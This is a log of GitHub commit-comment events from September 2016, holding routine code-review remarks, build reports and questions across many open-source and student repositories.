{"id":"4592191071","type":"CommitCommentEvent","actor":{"login":"vanmelick"},"repo":{"name":"textpattern/textpacks"},"payload":{"comment":{"id":19103233,"position":null,"line":null,"path":null,"commit_id":"c0c124f0ed8a6c393188eaac641cc20932b3ebc1","created_at":"2016-09-20T20:14:26Z","updated_at":"2016-09-20T20:14:26Z","body":"On 20/09/16 16:34, Pete Cooper wrote:\n> Add missing charset-related strings\n>\n> Shown in verbose/high detail diagnostics.\n>\n> @Bloke / @bloatware / @vanmelick -- some clarification/confirmation on\n> whether these descriptions are appropriate/accurate would be\n> appreciated. I've used best guess to get *something* in there instead\n> of a blank string.\n\nThings like 'character_set_client' are MySQL variable names. Translating \nthose only creates confusion. Just leave them as-is. At least then \npeople can Google for them and find meaningful info.\n\nhttp://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_character_set_client\n\nRegards,\n--Ruud\n"}},"created_at":"2016-09-20T20:14:26Z"}
{"id":"4592192514","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19103238,"position":16,"line":16,"path":"Lab3_12/src/com/company/Main.java","commit_id":"b33414a00ce64ea4883dc42a490df9586cd63fb0","created_at":"2016-09-20T20:14:43Z","updated_at":"2016-09-20T20:14:43Z","body":"А зачем два раза читаешь из файла одно и тоже? Здесь "}},"created_at":"2016-09-20T20:14:43Z"}
{"id":"4592193069","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19103240,"position":18,"line":18,"path":"Lab3_12/src/com/company/Main.java","commit_id":"b33414a00ce64ea4883dc42a490df9586cd63fb0","created_at":"2016-09-20T20:14:49Z","updated_at":"2016-09-20T20:14:49Z","body":"И здесь"}},"created_at":"2016-09-20T20:14:49Z"}
{"id":"4592195695","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19103243,"position":null,"line":null,"path":null,"commit_id":"32964d1c9ef4b06c4dd29de13458643cee2b947a","created_at":"2016-09-20T20:15:17Z","updated_at":"2016-09-20T20:15:17Z","body":"@gsaponaro @mbrunettini \r\n\r\nTomorrow I'm going to test the modifications in [**`feature/cluster-with-ssh-options`**](https://github.com/robotology/icub-main/commit/5ab2b2fe8ddc47097a6cb9af08c659d941517e3f) that should allow user to enable **`-X`** option on a **per node basis**.\r\n\r\nThis could represent a final solution to the problem."}},"created_at":"2016-09-20T20:15:17Z"}
{"id":"4592196068","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19103244,"position":null,"line":null,"path":null,"commit_id":"33292be60050185d98dcfc765c1d5972362ff6b9","created_at":"2016-09-20T20:15:21Z","updated_at":"2016-09-20T20:15:21Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T20:15:21Z"}
{"id":"4592196795","type":"CommitCommentEvent","actor":{"login":"timabbott"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":19103248,"position":null,"line":null,"path":null,"commit_id":"d084a35862d13356e1cf237ff36c44c97448c78f","created_at":"2016-09-20T20:15:28Z","updated_at":"2016-09-20T20:15:28Z","body":"haha OK :)"}},"created_at":"2016-09-20T20:15:28Z"}
{"id":"4592198543","type":"CommitCommentEvent","actor":{"login":"timabbott"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":19103252,"position":null,"line":null,"path":null,"commit_id":"d084a35862d13356e1cf237ff36c44c97448c78f","created_at":"2016-09-20T20:15:47Z","updated_at":"2016-09-20T20:15:47Z","body":"I need to address the absence of `realpath` on Ubuntu trusty properly and then I'll merge this."}},"created_at":"2016-09-20T20:15:47Z"}
{"id":"4592201707","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19103259,"position":8,"line":8,"path":"Lab3_12/src/com/company/ReverseString.java","commit_id":"b33414a00ce64ea4883dc42a490df9586cd63fb0","created_at":"2016-09-20T20:16:22Z","updated_at":"2016-09-20T20:16:22Z","body":"Строки так не создавай. Используй String str = \"\";"}},"created_at":"2016-09-20T20:16:22Z"}
{"id":"4592203377","type":"CommitCommentEvent","actor":{"login":"Arcanemagus"},"repo":{"name":"Arcanemagus/ci"},"payload":{"comment":{"id":19103267,"position":null,"line":null,"path":null,"commit_id":"a6520d703d4a264cc426131b884e4f50e375bb4f","created_at":"2016-09-20T20:16:40Z","updated_at":"2016-09-20T20:16:40Z","body":"Looks like this also fixed a merge artifact (still piping the script to `sh`)."}},"created_at":"2016-09-20T20:16:40Z"}
{"id":"4592204020","type":"CommitCommentEvent","actor":{"login":"chazelex"},"repo":{"name":"chazelex/atg-update-us114625"},"payload":{"comment":{"id":19103270,"position":null,"line":null,"path":null,"commit_id":"9dd8d49f2d4b4727381e55d201a9119b46c51987","created_at":"2016-09-20T20:16:46Z","updated_at":"2016-09-20T20:16:46Z","body":"The style addition show here should be added to the original product.css file:\r\n\r\n/common/common-mce/styles/css/v2/products.css"}},"created_at":"2016-09-20T20:16:46Z"}
{"id":"4592207501","type":"CommitCommentEvent","actor":{"login":"ds84182"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19103279,"position":8,"line":0,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/qs/tiles/BatteryTile.java","commit_id":"de1c685e3123a8ea29057d60468291c7bbb82df2","created_at":"2016-09-20T20:17:25Z","updated_at":"2016-09-20T20:17:25Z","body":"Why did you disable battery stats on lollipop? The BATTERY_STATS permission is already given to SystemUI"}},"created_at":"2016-09-20T20:17:25Z"}
{"id":"4592207924","type":"CommitCommentEvent","actor":{"login":"krader1961"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19103281,"position":5,"line":345,"path":"Makefile.in","commit_id":"98470ab608b8eb723a5c7403c47d0151affe1fb2","created_at":"2016-09-20T20:17:30Z","updated_at":"2016-09-20T20:17:30Z","body":"Holy cow! Anyone who complains that Perl looks like RS-232 line noise had better not try to explain how makefile syntax is any better. Good job finding the unintended alteration to that statement, @floam."}},"created_at":"2016-09-20T20:17:30Z"}
{"id":"4592208378","type":"CommitCommentEvent","actor":{"login":"lukecwilliams"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19103282,"position":null,"line":null,"path":null,"commit_id":"cb07439a3a759ec5f6209d57139932a05e839715","created_at":"2016-09-20T20:17:35Z","updated_at":"2016-09-20T20:17:35Z","body":"Hi akfish - we're relatively new to this, but this change seems to have broken our builds.  \r\n\r\nPrior to this change, the \"handler\" property on server.route() had its type properly found by TS as well as those of request and reply.  With this change, on \"request\" and \"reply\" in this line we get \"implicitly any\" errors:\r\n\r\n> handler: (request, reply) => { console.log(\"foobar\"); },\r\n\r\nRemoving the four lines containing this code fixes this and lets us build again:\r\n\r\n> <T>(request: Request, reply: IStrictReply<T>): void;\r\n\r\nWe can also fix it by explicitly setting the type of request and reply to Hapi.Request and Hapi.IReply but that seems like it should be unnecessary.\r\n\r\nCan you comment on this?"}},"created_at":"2016-09-20T20:17:35Z"}
{"id":"4592208423","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19103283,"position":6,"line":21,"path":"static/css/material.less","commit_id":"5175464227e0812f244844bcda915f99d4859ec0","created_at":"2016-09-20T20:17:36Z","updated_at":"2016-09-20T20:17:36Z","body":"Don't use `0px`, use `0`. It's syntactically more correct."}},"created_at":"2016-09-20T20:17:36Z"}
{"id":"4592212887","type":"CommitCommentEvent","actor":{"login":"davidgfnet"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19103293,"position":null,"line":null,"path":null,"commit_id":"0dc18c913191e6037ba3ededcd39074a95d04284","created_at":"2016-09-20T20:18:24Z","updated_at":"2016-09-20T20:18:24Z","body":"Hey, I wasnt trying to make an argument at all. I just prefer battery cause I dont wanna have a cable over there, period.\r\nAbout measuring the average power (or current) consumption. It is not trivial. Yeah sure I can measure battery discharge, that's what I did. Say 7 days it took to discharge the battery from fully charged. What's the average power consumption in Watts? No idea, cause I don't know the battery capacity."}},"created_at":"2016-09-20T20:18:24Z"}
{"id":"4592216020","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19103307,"position":10,"line":10,"path":"Lab3_12/src/com/company/ReverseString.java","commit_id":"b33414a00ce64ea4883dc42a490df9586cd63fb0","created_at":"2016-09-20T20:18:59Z","updated_at":"2016-09-20T20:18:59Z","body":"А зачем здесь присваивать str новый стрингбуффер, если ты потом выводишь этот str? Сразу можно выводить то, что перевернет StringBuffer.\r\nА, и если numberRows будет 1000, у тебя будут 1000 объектов StringBuffer находиться в куче. А эт че-то не очень. Лучше юзать один StringBuffer, запихивать туда i-ую строку, переворачивать ее, выводить и потом чистить StringBuffer для следующей строки."}},"created_at":"2016-09-20T20:18:59Z"}
{"id":"4592216914","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19103312,"position":10,"line":90,"path":"applet/src/os.c","commit_id":"da19622086cfbc1ec790797f2302b72463dca4a8","created_at":"2016-09-20T20:19:10Z","updated_at":"2016-09-20T20:19:10Z","body":"info: @sijskes sp is interesting to locate the thread ... the mem aria is defined   on task create "}},"created_at":"2016-09-20T20:19:10Z"}
{"id":"4592220041","type":"CommitCommentEvent","actor":{"login":"khuey"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19103320,"position":null,"line":null,"path":null,"commit_id":"539c64c3861bf49c468faccf2467a0ab3db80f16","created_at":"2016-09-20T20:19:44Z","updated_at":"2016-09-20T20:19:44Z","body":"Yeah, we could add the debugging commands from #1803 as a test."}},"created_at":"2016-09-20T20:19:44Z"}
{"id":"4592220288","type":"CommitCommentEvent","actor":{"login":"Ethervil"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":19103321,"position":null,"line":null,"path":null,"commit_id":"7649b3ee6b64e52c10b3210e2ffab97786e00e9d","created_at":"2016-09-20T20:19:47Z","updated_at":"2016-09-20T20:19:47Z","body":"Thanks for merging in my features.\r\n\r\nThe next set will likely be more enemies."}},"created_at":"2016-09-20T20:19:47Z"}
{"id":"4592221790","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19103326,"position":17,"line":17,"path":"Lab3_12/src/com/company/Main.java","commit_id":"b33414a00ce64ea4883dc42a490df9586cd63fb0","created_at":"2016-09-20T20:20:03Z","updated_at":"2016-09-20T20:20:03Z","body":"В приципе, в этом случае можно не создавать экземпляр класса, а использовать метод как static"}},"created_at":"2016-09-20T20:20:03Z"}
{"id":"4592223764","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19103335,"position":null,"line":null,"path":null,"commit_id":"f1be3f53c640ef44c04f516f5a81f6ea96f6e283","created_at":"2016-09-20T20:20:24Z","updated_at":"2016-09-20T20:20:24Z","body":"i see this in rc.shutdown:\r\n\r\n\t 3) #PDEV1.\r\n\t  asktosave_func\r\n\t  if [ $? -eq 0 ]; then \r\n\t\techo \"$(printf \"$(gettext 'Saving session to %s...')\" \"$PDEV1\")\" >/dev/console\r\n\t\t/usr/sbin/snapmergepuppy /initrd/pup_ro1 /initrd/pup_rw\r\n\t  fi\r\n\t  ;;\r\n\r\nis this pupmode deprecated or something?"}},"created_at":"2016-09-20T20:20:24Z"}
{"id":"4592223940","type":"CommitCommentEvent","actor":{"login":"spaceloop123"},"repo":{"name":"zidabah/university_labs"},"payload":{"comment":{"id":19103336,"position":7,"line":7,"path":"Lab3_12/src/com/company/ReverseString.java","commit_id":"b33414a00ce64ea4883dc42a490df9586cd63fb0","created_at":"2016-09-20T20:20:26Z","updated_at":"2016-09-20T20:20:26Z","body":"Вот этот метод как static"}},"created_at":"2016-09-20T20:20:26Z"}
{"id":"4592227272","type":"CommitCommentEvent","actor":{"login":"ThisTestUser"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19103345,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-20T20:21:05Z","updated_at":"2016-09-20T20:21:05Z","body":"Also, the Phase 2 checks are probably not banning yet, just don't hit the bot and you'll be okay for now."}},"created_at":"2016-09-20T20:21:05Z"}
{"id":"4592231524","type":"CommitCommentEvent","actor":{"login":"vanfstd"},"repo":{"name":"snabbco/snabb"},"payload":{"comment":{"id":19103356,"position":28,"line":56,"path":"src/apps/ipsec/esp.lua","commit_id":"fa01474c430dbf938feda5d5df7775b377b14fe2","created_at":"2016-09-20T20:21:49Z","updated_at":"2016-09-20T20:21:49Z","body":"Stalling resync is a good point (although I don't think it's indefintely, sooner or later one of the non-malicious packets would arrive at the right time and become the packet we synchronize with).\r\n\r\n> [when not out of sync,] authenticated packets will reset decap_fail and thus cancel out the resync overhead\r\nTrue.  It's also a good argument for `resync_threshold` being rather large!\r\n\r\n\r\n>Does that make sense?\r\n"}},"created_at":"2016-09-20T20:21:49Z"}
{"id":"4592235360","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103367,"position":3,"line":3,"path":"player_actions.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:22:30Z","updated_at":"2016-09-20T20:22:30Z","body":"Use current location rather than co_ordinates?"}},"created_at":"2016-09-20T20:22:30Z"}
{"id":"4592235529","type":"CommitCommentEvent","actor":{"login":"christoomey"},"repo":{"name":"jayroh/dotfiles.new"},"payload":{"comment":{"id":19103368,"position":null,"line":null,"path":null,"commit_id":"183dc9b23ed750a2df25eab505e55038bcf322f8","created_at":"2016-09-20T20:22:32Z","updated_at":"2016-09-20T20:22:32Z","body":"![](https://media.giphy.com/media/XreQmk7ETCak0/giphy.gif)\r\n"}},"created_at":"2016-09-20T20:22:32Z"}
{"id":"4592238355","type":"CommitCommentEvent","actor":{"login":"Rover656"},"repo":{"name":"mtaheij/PoGo-UWP"},"payload":{"comment":{"id":19103375,"position":null,"line":null,"path":null,"commit_id":"4583d0f65dcec0166e3a3f025b57d51bee82f001","created_at":"2016-09-20T20:23:02Z","updated_at":"2016-09-20T20:23:02Z","body":"Just change hack to hacky or just ignore it, it can still be merged"}},"created_at":"2016-09-20T20:23:02Z"}
{"id":"4592240166","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19103384,"position":null,"line":null,"path":null,"commit_id":"21c5a51947a35cdba9bece35093b7dc32f621d1c","created_at":"2016-09-20T20:23:21Z","updated_at":"2016-09-20T20:23:21Z","body":"Here I'm just trying to correct the simplified parameters but I might try some more tunings if this works. Anyway, I would like to change the role of PSQT..."}},"created_at":"2016-09-20T20:23:21Z"}
{"id":"4592252983","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103423,"position":5,"line":5,"path":"player_actions.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:25:45Z","updated_at":"2016-09-20T20:25:45Z","body":"Not needed?"}},"created_at":"2016-09-20T20:25:45Z"}
{"id":"4592254220","type":"CommitCommentEvent","actor":{"login":"mtaheij"},"repo":{"name":"mtaheij/PoGo-UWP"},"payload":{"comment":{"id":19103429,"position":null,"line":null,"path":null,"commit_id":"4583d0f65dcec0166e3a3f025b57d51bee82f001","created_at":"2016-09-20T20:25:57Z","updated_at":"2016-09-20T20:25:57Z","body":"I will leave a nasty red X next to the PR's, it might keep @ST-Apps from merging the PR completely ;-)"}},"created_at":"2016-09-20T20:25:57Z"}
{"id":"4592255003","type":"CommitCommentEvent","actor":{"login":"markusmo3"},"repo":{"name":"iluwatar/java-design-patterns"},"payload":{"comment":{"id":19103431,"position":1,"line":3,"path":"abstract-document/etc/abstract-document.urm.puml","commit_id":"6026eedd51b9753250051b620312bbedd2ccd6ef","created_at":"2016-09-20T20:26:04Z","updated_at":"2016-09-20T20:26:04Z","body":"Okay the pom.xml change seems to be needed for [some reason](https://www.eclipse.org/m2e/documentation/m2e-execution-not-covered.html) i guess...\r\n\r\nI still really dont like discrepancies between two machines...\r\nI will commit over your changes after introducing some sorting in the urm plugin (sigh, the git history will be a mess...)"}},"created_at":"2016-09-20T20:26:04Z"}
{"id":"4592256234","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19103433,"position":null,"line":null,"path":null,"commit_id":"460270baaf7d587ebe13ec7ab5b9684c81eba968","created_at":"2016-09-20T20:26:16Z","updated_at":"2016-09-20T20:26:16Z","body":"Ah, sounds reasonable. I can just as well make that improvement later."}},"created_at":"2016-09-20T20:26:16Z"}
{"id":"4592258575","type":"CommitCommentEvent","actor":{"login":"Rover656"},"repo":{"name":"mtaheij/PoGo-UWP"},"payload":{"comment":{"id":19103439,"position":null,"line":null,"path":null,"commit_id":"4583d0f65dcec0166e3a3f025b57d51bee82f001","created_at":"2016-09-20T20:26:41Z","updated_at":"2016-09-20T20:26:41Z","body":"Ok, understandable."}},"created_at":"2016-09-20T20:26:41Z"}
{"id":"4592259810","type":"CommitCommentEvent","actor":{"login":"Ravenstine"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19103441,"position":86,"line":26,"path":"src/css/layout/_grids.scss","commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-20T20:26:55Z","updated_at":"2016-09-20T20:26:55Z","body":"Probably not."}},"created_at":"2016-09-20T20:26:55Z"}
{"id":"4592273556","type":"CommitCommentEvent","actor":{"login":"sixlettervariables"},"repo":{"name":"atesgoral/hrm-solutions"},"payload":{"comment":{"id":19103464,"position":37,"line":28,"path":"solutions/40-Prime-Factory-28.399/28.247-jdashton.asm","commit_id":"2fc5aeef1adea4df564f21623007e8812151674b","created_at":"2016-09-20T20:29:25Z","updated_at":"2016-09-20T20:29:25Z","body":"Also fails on 35 (5*7), 49 (7*7), 65 (5*13), 85 (5*17), 91 (7*13), 95 (5*19), 115 (5*23), etc. Basically anything with two or more prime factors greater than 5."}},"created_at":"2016-09-20T20:29:25Z"}
{"id":"4592274262","type":"CommitCommentEvent","actor":{"login":"chazelex"},"repo":{"name":"chazelex/atg-update-us114625"},"payload":{"comment":{"id":19103468,"position":null,"line":null,"path":null,"commit_id":"811aef62d0b1a4a8d710a26f3657a3b59c2b7219","created_at":"2016-09-20T20:29:33Z","updated_at":"2016-09-20T20:29:33Z","body":"The style addition show here should be added to the original atg-cart.css file:\r\n\r\n/common/common-mce/styles/css/v2/atg-cart.css"}},"created_at":"2016-09-20T20:29:33Z"}
{"id":"4592275459","type":"CommitCommentEvent","actor":{"login":"cblgh"},"repo":{"name":"ojack/LiveLab"},"payload":{"comment":{"id":19103473,"position":null,"line":null,"path":null,"commit_id":"ef3472f6c3ce410e796a9460f7148a5820879bb2","created_at":"2016-09-20T20:29:47Z","updated_at":"2016-09-20T20:29:47Z","body":":ok_hand::ok_hand::ok_hand: "}},"created_at":"2016-09-20T20:29:47Z"}
{"id":"4592276495","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19103475,"position":5,"line":223,"path":"desktop/src/com/frostwire/gui/updates/UpdateMediator.java","commit_id":"e7a5331d31eae1b8f8b8531b15d2a3884e534534","created_at":"2016-09-20T20:29:59Z","updated_at":"2016-09-20T20:29:59Z","body":"I suppose this was important :D"}},"created_at":"2016-09-20T20:29:59Z"}
{"id":"4592279097","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103484,"position":11,"line":11,"path":"player_actions.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:30:25Z","updated_at":"2016-09-20T20:30:25Z","body":"rather than use result of action, specifically modify the relevant var in the current location object, then write the current location object details to the game world objects."}},"created_at":"2016-09-20T20:30:25Z"}
{"id":"4592286050","type":"CommitCommentEvent","actor":{"login":"ashanhol"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":19103505,"position":null,"line":null,"path":null,"commit_id":"69ff98fb96bf96707779dcb81f18d412b01cb59d","created_at":"2016-09-20T20:31:36Z","updated_at":"2016-09-20T20:31:36Z","body":"#44 "}},"created_at":"2016-09-20T20:31:36Z"}
{"id":"4592286657","type":"CommitCommentEvent","actor":{"login":"mko-io"},"repo":{"name":"kangax/compat-table"},"payload":{"comment":{"id":19103506,"position":null,"line":null,"path":null,"commit_id":"b0e34dc0c096e07ac13e682f029f5046da95493e","created_at":"2016-09-20T20:31:42Z","updated_at":"2016-09-20T20:31:42Z","body":"So exciting chrome canary(M55) finally enable TCO without flag?\r\n I made a small test on chrome canary with all flag reset to default. But still see the stack grows. Am I missing something?\r\n<img width=\"885\" alt=\"screen shot 2016-09-21 at 8 30 10 am\" src=\"https://cloud.githubusercontent.com/assets/10137567/18687789/cb7d7824-7fd5-11e6-9adf-17b707112f11.png\">\r\n<img width=\"542\" alt=\"screen shot 2016-09-21 at 8 30 21 am\" src=\"https://cloud.githubusercontent.com/assets/10137567/18687794/cecf3102-7fd5-11e6-957a-c2fcdb04c92f.png\">\r\n<img width=\"883\" alt=\"screen shot 2016-09-21 at 8 30 38 am\" src=\"https://cloud.githubusercontent.com/assets/10137567/18687798/d139e3e2-7fd5-11e6-812f-6000e0631b03.png\">\r\n\r\n"}},"created_at":"2016-09-20T20:31:42Z"}
{"id":"4592288783","type":"CommitCommentEvent","actor":{"login":"wilirius"},"repo":{"name":"leocavalcante/oc-backendusertree"},"payload":{"comment":{"id":19103510,"position":null,"line":null,"path":null,"commit_id":"4b1518f4ee0f191700e29a58cebaede775f2af18","created_at":"2016-09-20T20:32:03Z","updated_at":"2016-09-20T20:32:03Z","body":"For super users this still returns null. Looking into where to pull this for them. @leocavalcante "}},"created_at":"2016-09-20T20:32:03Z"}
{"id":"4592289775","type":"CommitCommentEvent","actor":{"login":"VladimirMangos"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19103514,"position":6,"line":3570,"path":"src/game/SpellAuras.cpp","commit_id":"40ee650534c098ed2a12c6cb5d9a26dba231f7b3","created_at":"2016-09-20T20:32:12Z","updated_at":"2016-09-20T20:32:12Z","body":"I think you can simplify code to GetCasterGuid(). Ofc it will be non zero for GO casts. But as I look in related code it must work fine in this case also."}},"created_at":"2016-09-20T20:32:12Z"}
{"id":"4592291690","type":"CommitCommentEvent","actor":{"login":"flagoss"},"repo":{"name":"Arcaratus/BloodArsenal"},"payload":{"comment":{"id":19103519,"position":null,"line":null,"path":null,"commit_id":"f5fc3bd7e952073259d545930716de9ac2609fc9","created_at":"2016-09-20T20:32:31Z","updated_at":"2016-09-20T20:32:31Z","body":"I am trying to compile the project but it won't.\r\n\r\nFAILURE: Build failed with an exception.\r\n\r\n* Where:\r\nBuild file 'C:\\BloodArsenal\\build.gradle' line: 39\r\n\r\n* What went wrong:\r\nA problem occurred evaluating root project 'BloodArsenal'.\r\n> repository not found: C:\\BloodArsenal"}},"created_at":"2016-09-20T20:32:31Z"}
{"id":"4592291944","type":"CommitCommentEvent","actor":{"login":"eugeneia"},"repo":{"name":"snabbco/snabb"},"payload":{"comment":{"id":19103520,"position":95,"line":178,"path":"src/lib/ipsec/esp.lua","commit_id":"fa01474c430dbf938feda5d5df7775b377b14fe2","created_at":"2016-09-20T20:32:33Z","updated_at":"2016-09-20T20:32:33Z","body":"Agree, its weird. I am still in love with the idea that the complexity of API calls is predictable though. The cost of `decapsulate` is constant and `resync` is `n * decapsulate`. The cost of the previous `decapsulate` is variable. Might be a bit esoteric of me to prefer the former, but the simplicity of both `lib.ipsec` and `apps.ipse.espc` (I think its still simple, before it was a really thin wrapper) make me root for this API.\r\n\r\nFor instance, this line https://github.com/snabbco/snabb/commit/1b084281848b57ac320c8a4cef92b17610a77b44#diff-43eed07c0c5cb316e7ea2726a3e45b10R178 allocates because it calls `ffi.new` which will trigger the GC in the data plane. Took me really long to notice.^^\r\n\r\nIt would be cooler to have a simpler API, obviously."}},"created_at":"2016-09-20T20:32:33Z"}
{"id":"4592293217","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19103523,"position":27,"line":58,"path":"static/css/material.less","commit_id":"5175464227e0812f244844bcda915f99d4859ec0","created_at":"2016-09-20T20:32:47Z","updated_at":"2016-09-20T20:32:47Z","body":"I couldn't understand why this was necessary so I loaded it up in a browser and turned it off and nothing changed. What is this supposed to do?"}},"created_at":"2016-09-20T20:32:47Z"}
{"id":"4592295174","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19103528,"position":null,"line":null,"path":null,"commit_id":"8a9c8a89532cbe403458793b92884ea53b58fcf0","created_at":"2016-09-20T20:33:07Z","updated_at":"2016-09-20T20:33:07Z","body":"Oh. That's too bad :( @karakum want to attempt fixing that?"}},"created_at":"2016-09-20T20:33:07Z"}
{"id":"4592295854","type":"CommitCommentEvent","actor":{"login":"dplumptre"},"repo":{"name":"demifreeze/mytodolist"},"payload":{"comment":{"id":19103530,"position":null,"line":null,"path":null,"commit_id":"b2667de697d383542c6d310adeb6e3d8505f7c00","created_at":"2016-09-20T20:33:14Z","updated_at":"2016-09-20T20:33:14Z","body":"all the necessary steps"}},"created_at":"2016-09-20T20:33:14Z"}
{"id":"4592296097","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103531,"position":3,"line":3,"path":"player_actions.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:33:17Z","updated_at":"2016-09-20T20:33:17Z","body":"Create action class which calls relevant action methods, instead of using this method?"}},"created_at":"2016-09-20T20:33:17Z"}
{"id":"4592298411","type":"CommitCommentEvent","actor":{"login":"chrfinnsen"},"repo":{"name":"chrfinnsen/solidstate"},"payload":{"comment":{"id":19103539,"position":null,"line":null,"path":null,"commit_id":"94c4a909349a82229c3fe8d886ba5172cfe19841","created_at":"2016-09-20T20:33:40Z","updated_at":"2016-09-20T20:33:40Z","body":"Die Suche nach den Snippets setzt natürlich voraus, dass das eigene vim analog zu meinem konfiguriert ist. Meine Konfiguration befindet sich in dem entsprechenden Repository."}},"created_at":"2016-09-20T20:33:40Z"}
{"id":"4592298462","type":"CommitCommentEvent","actor":{"login":"gidili"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19103540,"position":31,"line":185,"path":"src/main/webapp/js/components/ComponentsInitialization_OSB.js","commit_id":"fced96a82a343de07bb7d6bc5d8d48bb14e50e34","created_at":"2016-09-20T20:33:40Z","updated_at":"2016-09-20T20:33:40Z","body":"@jrmartin question: why do we have scripts in the value field? I thought it was gonna be like the value field in a dropdown (an integer or string to identify the option, to be used or not depending if the controls is being used like a dropdown), nothing to do with executable stuff? Granted, theoretically nothing stops the user from putting a piece of javascript there and define a click handler that runs it like you did :)"}},"created_at":"2016-09-20T20:33:40Z"}
{"id":"4592300287","type":"CommitCommentEvent","actor":{"login":"Warlockbugs"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19103547,"position":6,"line":3570,"path":"src/game/SpellAuras.cpp","commit_id":"40ee650534c098ed2a12c6cb5d9a26dba231f7b3","created_at":"2016-09-20T20:33:58Z","updated_at":"2016-09-20T20:33:58Z","body":"Will do, but probably not worth a separate commit itself. I'll try to remember it fo the next time i need to change something around here."}},"created_at":"2016-09-20T20:33:58Z"}
{"id":"4592301104","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":19103549,"position":26,"line":632,"path":"lisp/git-commit.el","commit_id":"1c05b110ef5629e607feea0384a19ac2c036cc51","created_at":"2016-09-20T20:34:06Z","updated_at":"2016-09-20T20:34:06Z","body":"The byte-compiler complains about these variables:\r\n\r\n```\r\ngit-commit.el:631:36:Warning: reference to free variable `font-lock-beg'\r\ngit-commit.el:632:36:Warning: reference to free variable `font-lock-end'\r\ngit-commit.el:633:52:Warning: assignment to free variable `font-lock-beg'\r\ngit-commit.el:634:38:Warning: assignment to free variable `font-lock-end'\r\n```"}},"created_at":"2016-09-20T20:34:06Z"}
{"id":"4592301116","type":"CommitCommentEvent","actor":{"login":"bryanjjohnson"},"repo":{"name":"i18next/i18next-xhr-backend"},"payload":{"comment":{"id":19103550,"position":null,"line":null,"path":null,"commit_id":"7266b32931e13af985887a6d190ed3e1927c18ad","created_at":"2016-09-20T20:34:06Z","updated_at":"2016-09-20T20:34:06Z","body":"Have the typing been moved to DT yet? Because this last release removed them and now I'm not sure where to find them?"}},"created_at":"2016-09-20T20:34:06Z"}
